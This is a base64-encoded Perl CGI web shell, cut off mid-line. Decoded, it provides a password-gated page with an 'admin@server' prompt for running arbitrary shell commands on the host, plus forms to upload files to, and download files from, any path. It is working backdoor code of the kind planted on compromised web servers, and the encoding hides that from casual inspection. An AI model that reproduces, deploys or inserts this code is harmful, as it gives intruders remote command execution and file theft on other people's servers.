S0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9naW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBhZ2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQgZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBhc3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXI7DQoJCXByaW50ICZMaXN0RGlyOw0KCX0NCgllbHNlICMgcGFzc3dvcmQgZGlkbid0IG1hdGNoDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJCSZQcmludExvZ2luU2NyZWVuOw0KCQlpZigkTG9naW5QYXNzd29yZCBuZSAiIikgIyBzb21lIHBhc3N3b3JkIHdhcyBlbnRlcmVkDQoJCXsNCgkJCSZQcmludExvZ2luRmFpbGVkTWVzc2FnZTsNCg0KCQl9DQoJCSZQcmludExvZ2luRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybQ0Kew0KCSRFbmNvZGVDdXJyZW50RGlyID0gRW5jb2RlRGlyKCRDdXJyZW50RGlyKTsNCglteSAkZGlyPSAiPHNwYW4gc3R5bGU9J2ZvbnQ6IDExcHQgVmVyZGFuYTsgZm9udC13ZWlnaHQ6IGJvbGQ7Jz4iLiZBZGRMaW5rRGlyKCJjb21tYW5kIikuIjwvc3Bhbj4iOw0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiPGZvbnQgY29sb3I9JyNGRkZGRkYnPlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJDwvZm9udD4gIjsNCglyZXR1cm4gPDxFTkQ7DQo8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIiBvblN1Ym1pdD0iRW5jb2RlcignYycpIj4NCg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiPg0KDQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEVuY29kZUN1cnJlbnREaXIiPg0KJFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjQwIiBuYW1lPSJjIiBpZD0iYyI+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPg0KPC9mb3JtPg0KRU5EDQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtDQp7DQoJJEVuY29kZUN1cnJlbnREaXIgPSBFbmNvZGVEaXIoJEN1cnJlbnREaXIpOw0KCW15ICRkaXIgPSAmQWRkTGlua0RpcigiZG93bmxvYWQiKTsgDQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsNCglyZXR1cm4gPDxFTkQ7DQo8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkRW5jb2RlQ3VycmVudERpciI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iZG93bmxvYWQiPg0KJFByb21wdCBkb3dubG9hZDxicj48YnI+DQpGaWxlbmFtZTogPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPg0KRG93bmxvYWQ6IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+DQoNCjwvZm9ybT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0NCnsNCgkkRW5jb2RlQ3VycmVudERpciA9IEVuY29kZURpcigkQ3VycmVudERpcik7DQoJbXkgJGRpcj0gJkFkZExpbmtEaXIoInVwbG9hZCIpOw0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkICI7DQoJcmV0dXJuIDw8RU5EOw0KPGZvcm0gbmFtZT0iZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQokUHJvbXB0IHVwbG9hZDxicj48YnI+DQpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPg0KT3B0aW9uczogJm5ic3A7PGlucHV0IHR5cGU9ImNoZWNrYm94IiBuYW1lPSJvIiBpZD0idXAiIHZhbHVlPSJvdmVyd3JpdGUiPg0KPGxhYmVsIGZvcj0idXAiPk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8L2xhYmVsPjxicj48YnI+DQpVcGxvYWQ6Jm5ic3A7Jm5ic3A7Jm5ic3A7PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkRW5jb2RlQ3VycmVudERpciI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4NCjwvZm9ybT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHRpbWVvdXQgZm9yIGEgY29tbWFuZCBleHBpcmVzLiBXZSBuZWVkIHRvDQojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMNCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIENvbW1hbmRUaW1lb3V0DQp7DQoJaWYoISRXaW5OVCkNCgl7DQoJCWFsYXJtKDApOw0KCQlyZXR1cm4gPDxFTkQ7DQo8L3RleHRhcmVhPg0KPGJyPjxmb250IGNvbG9yPXllbGxvdz4NCkNvbW1hbmQgZXhjZWVkZWQgbWF4aW11bSB0aW1lIG9mICRDb21tYW5kVGltZW91dER1cmF0aW9uIHNlY29uZChzKS48L2ZvbnQ+DQo8YnI+PGZvbnQgc2l6ZT0nNicgY29sb3I9cmVkPktpbGxlZCBpdCE8L2ZvbnQ+DQpFTkQNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gZGlzcGxheXMgdGhlIHBhZ2UgdGhhdCBjb250YWlucyBhIGxpbmsgd2hpY2ggYWxsb3dzIHRoZSB1c2VyDQojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaA0KIyBmZWF0dXJlIHRoYXQgc3RhcnRzIHRoZSBkb3dubG9hZCBhdXRvbWF0aWNhbGx5Lg0KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgZmlsZW5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RG93bmxvYWRMaW5rUGFnZQ0Kew0KCWxvY2FsKCRGaWxlVXJsKSA9IEBfOw0KCW15ICRyZXN1bHQ9IiI7DQoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzDQoJew0KCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyDQoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCgkJJERvd25sb2FkTGluayA9ICIkU2NyaXB0TG9jYXRpb24/YT1kb3dubG9hZCZmPSRGaWxlVXJsJm89Z28iOw0KCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCSRyZXN1bHQgLj0gPDxFTkQ7DQpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4NCg0KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksDQo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPg0KRU5EDQoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJfQ0KCWVsc2UgIyBmaWxlIGRvZXNuJ3QgZXhpc3QNCgl7DQoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCEiOw0KCQkkcmVzdWx0IC49ICZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJfQ0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIHJlYWRzIHRoZSBzcGVjaWZpZWQgZmlsZSBmcm9tIHRoZSBkaXNrIGFuZCBzZW5kcyBpdCB0byB0aGUNCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4NCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIHNlbnQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXINCnsNCglteSAkcmVzdWx0ID0gIiI7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlmKG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNURE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShTRU5ERklMRSk7DQoJCWV4aXQoMSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkkcmVzdWx0IC49ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAkISI7DQoJCSRyZXN1bHQgLj0mUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciBkb3dubG9hZHMgYSBmaWxlLiBJdCBkaXNwbGF5cyBhIG1lc3NhZ2UNCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0KIyBUaGlzIGZ1bmN0aW9uIGlzIGFsc28gY2FsbGVkIHdoZW4gdGhlIHVzZXIgY2xpY2tzIG9uIHRoYXQgbGluay4gSW4gdGhpcyBjYXNlLA0KIyB0aGUgZmlsZSBpcyByZWFkIGFuZCBzZW50IHRvIHRoZSBicm93c2VyLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEJlZ2luRG93bmxvYWQNCnsNCgkkRW5jb2RlQ3VycmVudERpciA9IEVuY29kZURpcigkQ3VycmVudERpcik7DQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUNCiMgZmlsZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBzdGFydHMgdGhlIHVwbG9hZCBwcm9jZXNzLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFVwbG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4NCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQ0KCXsNCgkJcmV0dXJuICZQcmludEZpbGVVcGxvYWRGb3JtOw0KDQoJfQ0KCW15ICRyZXN1bHQ9IiI7DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCgkkcmVzdWx0IC49ICJVcGxvYWRpbmcgJFRyYW5zZmVyRmlsZSB0byAkQ3VycmVudERpci4uLjxicj4iOw0KDQoJIyBnZXQgdGhlIGZ1bGxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgY3JlYXRlZA0KCWNob3AoJFRhcmdldE5hbWUpIGlmICgkVGFyZ2V0TmFtZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7DQoJJFRhcmdldE5hbWUgLj0gJFBhdGhTZXAuJDE7DQoNCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsNCgkjIGlmIHRoZSBmaWxlIGV4aXN0cyBhbmQgd2UgYXJlIG5vdCBzdXBwb3NlZCB0byBvdmVyd3JpdGUgaXQNCglpZigtZSAkVGFyZ2V0TmFtZSAmJiAkT3B0aW9ucyBuZSAib3ZlcndyaXRlIikNCgl7DQoJCSRyZXN1bHQgLj0gIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsNCgl9DQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQNCgl7DQoJCWlmKG9wZW4oVVBMT0FERklMRSwgIj4kVGFyZ2V0TmFtZSIpKQ0KCQl7DQoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsNCgkJCXByaW50IFVQTE9BREZJTEUgJGlueydmaWxlZGF0YSd9Ow0KCQkJY2xvc2UoVVBMT0FERklMRSk7DQoJCQkkcmVzdWx0IC49ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCSRyZXN1bHQgLj0gIkZpbGUgUGF0aDogJFRhcmdldE5hbWU8YnI+IjsNCgkJfQ0KCQllbHNlDQoJCXsNCgkJCSRyZXN1bHQgLj0gIkZhaWxlZDogJCE8YnI+IjsNCgkJfQ0KCX0NCgkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJcmV0dXJuICZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJfQ0KDQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfCAoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCXJldHVybiAmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsNCgkJcmV0dXJuICZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQgZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFuZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRpbWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hhbmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRoZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJJEN1cnJlbnREaXIgPSAmVHJpbVNsYXNoZXMoJEN1cnJlbnREaXIpOw0KCW15ICRyZXN1bHQ9IiI7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOw0KCQljaG9tcCgkQ3VycmVudERpciA9IGAkQ29tbWFuZGApOw0KCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KDQoJCSRyZXN1bHQgLj0gIkNvbW1hbmQ6IDxydW4+JFJ1bkNvbW1hbmQgPC9ydW4+PGJyPjx0ZXh0YXJlYSBjb2xzPSckY29scycgcm93cz0nJHJvd3MnIHNwZWxsY2hlY2s9J2ZhbHNlJz4iOw0KCQkjIHh1YXQgdGhvbmcgdGluIGtoaSBjaHV5ZW4gZGVuIDEgdGh1IG11YyBuYW8gZG8hDQoJCSRSdW5Db21tYW5kPSAkV2luTlQ/ImRpciI6ImRpciAtbGlhIjsNCgkJJHJlc3VsdCAuPSAmUnVuQ21kOw0KCX1lbHNpZigkUnVuQ29tbWFuZCA9fiBtL15ccyplZGl0XHMrKC4rKS8pDQoJew0KCQkkcmVzdWx0IC49ICAmU2F2ZUZpbGVGb3JtOw0KCX1lbHNlDQoJew0KCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkkcmVzdWx0IC49ICJDb21tYW5kOiA8cnVuPiRSdW5Db21tYW5kPC9ydW4+PGJyPjx0ZXh0YXJlYSBpZD0nZGF0YScgY29scz0nJGNvbHMnIHJvd3M9JyRyb3dzJyBzcGVsbGNoZWNrPSdmYWxzZSc+IjsNCgkJJHJlc3VsdCAuPSZSdW5DbWQ7DQoJfQ0KCSRyZXN1bHQgLj0gICI8L3RleHRhcmVhPiI7DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIHJ1biBjb21tYW5kDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUnVuQ21kDQp7DQoJbXkgJHJlc3VsdD0iIjsNCgkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7DQoJaWYoISRXaW5OVCkNCgl7DQoJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7DQoJCWFsYXJtKCRDb21tYW5kVGltZW91dER1cmF0aW9uKTsNCgl9DQoJaWYoJFNob3d